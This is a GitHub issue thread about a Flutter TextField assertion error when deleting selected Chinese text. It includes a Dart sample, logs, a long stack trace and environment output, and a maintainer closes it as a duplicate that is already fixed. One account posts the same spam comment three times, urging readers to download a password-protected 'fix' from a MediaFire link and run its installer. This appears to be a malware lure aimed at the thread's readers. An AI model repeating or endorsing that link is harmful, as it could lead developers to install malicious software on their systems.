### ISSUE TITLE
When input Chinese and selecte all, print an error message when delete

### ISSUE THREAD

**Issue by Junesui** [flutter/flutter#154155] opened 2024-08-27 02:43 UTC
### Steps to reproduce
1.useCupertinoPageRoute on android phone
2.user sample code（The text you enter must be larger than the width of the phone）, and select text from the back, but not the last text, and an error message will be displayed when delete  ※error will also occur when select all and delete

※not error when entering English or number

### Expected results

Delete text normally

### Actual results

Can be deleted normally, but an error occurs

### Code sample

<details open><summary>Code sample</summary>

```dart
import 'package:flutter/material.dart';

class TestPage extends StatefulWidget {
  const TestPage({super.key});

  @override
  State<TestPage> createState() => _TestPageState();
}

class _TestPageState extends State<TestPage> {
  TextEditingController _controller = TextEditingController(text: "测试文字" * 10);

  @override
  void dispose() {
    _controller.dispose();
    super.dispose();
  }

  @override
  Widget build(BuildContext context) {
    return Scaffold(
      body: SafeArea(
        child: Center(
          child: TextField(controller: _controller, maxLines: 1),
        ),
      ),
    );
  }
}

```

</details>

### Screenshots or Video

<details open>
<summary>Screenshots / Video demonstration</summary>

![097464a2ff9bb8ec13ef4b7b3e3b88b](https://github.com/user-attachments/assets/fb02c90c-94c6-4f79-b1c7-250a647bd65b)

</details>

### Logs

<details open><summary>Logs</summary>

```console
W/HiTouch_PressGestureDetector(18127): Touch pointer move a lot. The moving distance of X is:65.0, limit is:60The moving distance of Y is:6.0, limit is:60
I/InputMethodManager(18127): showSoftInput
I/InputMethodManager(18127): mServedView =com.suiz.zero;view =com.suiz.zero;flags =0
I/HwSecImmHelper(18127): mSecurityInputMethodService is null
I/InputMethodManager(18127): showSoftInput
I/InputMethodManager(18127): mServedView =com.suiz.zero;view =com.suiz.zero;flags =0
I/HwSecImmHelper(18127): mSecurityInputMethodService is null

======== Exception caught by rendering library =====================================================
The following assertion was thrown during performLayout():
RenderBox.size accessed beyond the scope of resize, layout, or permitted parent access. RenderBox can always access its own size, otherwise, the only object that is allowed to read RenderBox.size is its parent, if they have said they will. It you hit this assert trying to access a child's size, pass "parentUsesSize: true" to that child's layout() in RenderFractionalTranslation.performLayout.
'package:flutter/src/rendering/box.dart':
Failed assertion: line 2178 pos 16: 'sizeAccessAllowed'


Either the assertion indicates an error in the framework itself, or we should provide substantially more information in this error message to help you determine and fix the underlying cause.
In either case, please report this assertion by filing a bug on GitHub:
  https://github.com/flutter/flutter/issues/new?template=2_bug.yml

The relevant error-causing widget was: 
  TextField TextField:file:///D:/C_DISK_DESKTOP/project/go/app/zero/lib/page/test_page.dart:25:18
When the exception was thrown, this was the stack: 
#2      RenderBox.size.<anonymous closure> (package:flutter/src/rendering/box.dart:2178:16)
#3      RenderBox.size (package:flutter/src/rendering/box.dart:2199:6)
#4      RenderFractionalTranslation.applyPaintTransform (package:flutter/src/rendering/proxy_box.dart:2952:24)
#5      RenderObject.getTransformTo (package:flutter/src/rendering/object.dart:3411:25)
#6      RenderBox.localToGlobal (package:flutter/src/rendering/box.dart:2887:39)
#7      RenderEditable._snapToPhysicalPixel (package:flutter/src/rendering/editable.dart:2276:33)
#8      RenderEditable.getLocalRectForCaret (package:flutter/src/rendering/editable.dart:1822:28)
#9      EditableTextState._handleContextMenuOnScroll (package:flutter/src/widgets/editable_text.dart:3852:56)
#10     EditableTextState.build.<anonymous closure> (package:flutter/src/widgets/editable_text.dart:5228:21)
#11     _NotificationElement.onNotification (package:flutter/src/widgets/notification_listener.dart:130:38)
#12     _NotificationNode.dispatchNotification (package:flutter/src/widgets/framework.dart:3403:18)
#13     Element.dispatchNotification (package:flutter/src/widgets/framework.dart:5077:24)
#14     Notification.dispatch (package:flutter/src/widgets/notification_listener.dart:60:13)
#15     ScrollActivity.dispatchScrollStartNotification (package:flutter/src/widgets/scroll_activity.dart:99:65)
#16     ScrollPosition.didStartScroll (package:flutter/src/widgets/scroll_position.dart:1027:15)
#17     ScrollPosition.beginActivity (package:flutter/src/widgets/scroll_position.dart:1018:7)
#18     ScrollPositionWithSingleContext.beginActivity (package:flutter/src/widgets/scroll_position_with_single_context.dart:113:11)
#19     ScrollPositionWithSingleContext.goBallistic (package:flutter/src/widgets/scroll_position_with_single_context.dart:146:7)
#20     IdleScrollActivity.applyNewDimensions (package:flutter/src/widgets/scroll_activity.dart:175:14)
#21     ScrollPosition.applyNewDimensions (package:flutter/src/widgets/scroll_position.dart:718:15)
#22     ScrollPositionWithSingleContext.applyNewDimensions (package:flutter/src/widgets/scroll_position_with_single_context.dart:102:11)
#23     ScrollPosition.applyContentDimensions (package:flutter/src/widgets/scroll_position.dart:647:7)
#24     RenderEditable.performLayout (package:flutter/src/rendering/editable.dart:2345:12)
#25     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#26     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111:21)
#27     _RenderSizeChangedWithCallback.performLayout (package:flutter/src/widgets/size_changed_layout_notifier.dart:90:11)
#28     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#29     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111:21)
#30     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#31     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111:21)
#32     RenderLeaderLayer.performLayout (package:flutter/src/rendering/proxy_box.dart:4751:11)
#33     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#34     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111:21)
#35     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#36     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111:21)
#37     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#38     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111:21)
#39     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#40     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111:21)
#41     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#42     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111:21)
#43     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#44     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111:21)
#45     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#46     RenderTapRegion.layout (package:flutter/src/widgets/tap_region.dart:568:11)
#47     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111:21)
#48     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#49     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111:21)
#50     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#51     ChildLayoutHelper.layoutChild (package:flutter/src/rendering/layout_helper.dart:61:11)
#52     _RenderDecoration._layout (package:flutter/src/material/input_decorator.dart:1036:67)
#53     _RenderDecoration.performLayout (package:flutter/src/material/input_decorator.dart:1299:44)
#54     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#55     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111:21)
#56     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#57     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111:21)
#58     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#59     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111:21)
#60     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#61     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111:21)
#62     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#63     RenderTapRegion.layout (package:flutter/src/widgets/tap_region.dart:568:11)
#64     RenderProxyBoxMixin.performLayout (package:flutter/src/rendering/proxy_box.dart:111:21)
#65     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#66     RenderPositionedBox.performLayout (package:flutter/src/rendering/shifted_box.dart:451:14)
#67     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#68     RenderPadding.performLayout (package:flutter/src/rendering/shifted_box.dart:234:12)
#69     RenderObject.layout (package:flutter/src/rendering/object.dart:2608:7)
#70     MultiChildLayoutDelegate.layoutChild (package:flutter/src/rendering/custom_layout.dart:173:12)
#71     _ScaffoldLayout.performLayout (package:flutter/src/material/scaffold.dart:1092:7)
#72     MultiChildLayoutDelegate._callPerformLayout (package:flutter/src/rendering/custom_layout.dart:237:7)
#73     RenderCustomMultiChildLayoutBox.performLayout (package:flutter/src/rendering/custom_layout.dart:404:14)
#74     RenderObject._layoutWithoutResize (package:flutter/src/rendering/object.dart:2446:7)
#75     PipelineOwner.flushLayout (package:flutter/src/rendering/object.dart:1052:18)
#76     PipelineOwner.flushLayout (package:flutter/src/rendering/object.dart:1065:15)
#77     RendererBinding.drawFrame (package:flutter/src/rendering/binding.dart:602:23)
#78     WidgetsBinding.drawFrame (package:flutter/src/widgets/binding.dart:1164:13)
#79     RendererBinding._handlePersistentFrameCallback (package:flutter/src/rendering/binding.dart:468:5)
#80     SchedulerBinding._invokeFrameCallback (package:flutter/src/scheduler/binding.dart:1397:15)
#81     SchedulerBinding.handleDrawFrame (package:flutter/src/scheduler/binding.dart:1318:9)
#82     SchedulerBinding._handleDrawFrame (package:flutter/src/scheduler/binding.dart:1176:5)
#83     _invoke (dart:ui/hooks.dart:312:13)
#84     PlatformDispatcher._drawFrame (dart:ui/platform_dispatcher.dart:419:5)
#85     _drawFrame (dart:ui/hooks.dart:283:31)
(elided 2 frames from class _AssertionError)
The following RenderObject was being processed when the exception was fired: RenderEditable#7fe43 relayoutBoundary=up20 NEEDS-LAYOUT NEEDS-PAINT
...  needs compositing
...  parentData: <none> (can use size)
...  constraints: BoxConstraints(w=360.0, 0.0<=h<=360.7)
...  size: Size(360.0, 24.0)
...  cursorColor: Color(0xff69f0ae)
...  showCursor: ValueNotifier<bool>#aa4b3(true)
...  maxLines: 1
...  minLines: null
...  selectionColor: Color(0x8069f0ae)
...  locale: zh_CN
...  selection: TextSelection.collapsed(offset: 29, affinity: TextAffinity.downstream, isDirectional: false)
...  offset: ScrollPositionWithSingleContext#82402(offset: 187.5, range: 0.0..171.0, viewport: 360.0, ScrollableState, ClampingScrollPhysics -> RangeMaintainingScrollPhysics -> ClampingScrollPhysics -> RangeMaintainingScrollPhysics, BallisticScrollActivity#27a2c(AnimationController#629c2(▶ 187.501; for BallisticScrollActivity)), ScrollDirection.idle)
  text: TextSpan
    debugLabel: ((dense bodyLarge 2021).merge((blackMountainView bodyLarge).apply)).merge(unknown)
    inherit: false
    color: Color(0xff1d1b20)
    family: Roboto
    size: 16.0
    weight: 400
    letterSpacing: 0.5
    baseline: ideographic
    height: 1.5x
    leadingDistribution: even
    decoration: Color(0xff1d1b20) TextDecoration.none
    "测试字测试文字测试文字测试文字测试文字测试文字测试文字测字试文字"
RenderObject: RenderEditable#7fe43 relayoutBoundary=up20 NEEDS-LAYOUT NEEDS-PAINT
  needs compositing
  parentData: <none> (can use size)
  constraints: BoxConstraints(w=360.0, 0.0<=h<=360.7)
  size: Size(360.0, 24.0)
  cursorColor: Color(0xff69f0ae)
  showCursor: ValueNotifier<bool>#aa4b3(true)
  maxLines: 1
  minLines: null
  selectionColor: Color(0x8069f0ae)
  locale: zh_CN
  selection: TextSelection.collapsed(offset: 29, affinity: TextAffinity.downstream, isDirectional: false)
  offset: ScrollPositionWithSingleContext#82402(offset: 187.5, range: 0.0..171.0, viewport: 360.0, ScrollableState, ClampingScrollPhysics -> RangeMaintainingScrollPhysics -> ClampingScrollPhysics -> RangeMaintainingScrollPhysics, BallisticScrollActivity#27a2c(AnimationController#629c2(▶ 187.501; for BallisticScrollActivity)), ScrollDirection.idle)
  text: TextSpan
    debugLabel: ((dense bodyLarge 2021).merge((blackMountainView bodyLarge).apply)).merge(unknown)
    inherit: false
    color: Color(0xff1d1b20)
    family: Roboto
    size: 16.0
    weight: 400
    letterSpacing: 0.5
    baseline: ideographic
    height: 1.5x
    leadingDistribution: even
    decoration: Color(0xff1d1b20) TextDecoration.none
    "测试字测试文字测试文字测试文字测试文字测试文字测试文字测字试文字"
====================================================================================================

```

</details>

### Flutter Doctor output

<details open><summary>Doctor output</summary>

```console
C:\Users\Administrator>flutter doctor -v
[√] Flutter (Channel stable, 3.24.1, on Microsoft Windows [Version 10.0.19045.4780], locale ja-JP)
    • Flutter version 3.24.1 on channel stable at D:\install_package\flutter\flutter
    • Upstream repository https://github.com/flutter/flutter.git
    • Framework revision 5874a72aa4 (6 days ago), 2024-08-20 16:46:00 -0500
    • Engine revision c9b9d5780d
    • Dart version 3.5.1
    • DevTools version 2.37.2

[√] Windows Version (Installed version of Windows is version 10 or higher)

[√] Android toolchain - develop for Android devices (Android SDK version 35.0.0)
    • Android SDK at D:\install_file\androidSdk
    • Platform android-35, build-tools 35.0.0
    • ANDROID_HOME = D:\install_file\androidSdk
    • Java binary at: D:\install_file\android studio\jbr\bin\java
    • Java version OpenJDK Runtime Environment (build 17.0.10+0--11609105)
    • All Android licenses accepted.

[√] Chrome - develop for the web
    • Chrome at C:\Users\Administrator\AppData\Local\Google\Chrome\Application\chrome.exe

[X] Visual Studio - develop Windows apps
    X Visual Studio not installed; this is necessary to develop Windows apps.
      Download at https://visualstudio.microsoft.com/downloads/.
      Please install the "Desktop development with C++" workload, including all of its default components

[√] Android Studio (version 2024.1)
    • Android Studio at D:\install_file\android studio
    • Flutter plugin can be installed from:
       https://plugins.jetbrains.com/plugin/9212-flutter
    • Dart plugin can be installed from:
       https://plugins.jetbrains.com/plugin/6351-dart
    • android-studio-dir = D:\install_file\android studio
    • Java version OpenJDK Runtime Environment (build 17.0.10+0--11609105)

[√] Connected device (4 available)
    • FIG LA1 (mobile)  • 35PDU18C11002945 • android-arm64  • Android 9 (API 28)
    • Windows (desktop) • windows          • windows-x64    • Microsoft Windows [Version 10.0.19045.4780]
    • Chrome (web)      • chrome           • web-javascript • Google Chrome 124.0.6367.91
    • Edge (web)        • edge             • web-javascript • Microsoft Edge 128.0.2739.42

[√] Network resources
    • All expected network resources are available.

! Doctor found issues in 1 category.
```

</details>

**Comment by jia6214876** [comment] 2024-08-27 02:44
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Junesui** [comment] 2024-08-27 02:44
https://github.com/flutter/flutter/issues/153003

**Comment by jia6214876** [comment] 2024-08-27 02:46
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment] 2024-08-27 02:46
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by danagbemava-nc** [comment] 2024-08-27 10:43
Hi @Junesui, this is a duplicate of https://github.com/flutter/flutter/issues/153003. The issue has been fixed on the master channel and a cherry pick has been requested in https://github.com/flutter/flutter/issues/153949. 

I'll be closing this since it has been fixed on the master channel and a cherry pick is open. If you do face this issue on the master channel, kindly leave a comment below and I will reopen this. 

Thank you

**Closed by danagbemava-nc** 2024-08-27 10:43 UTC
Labels: in triage
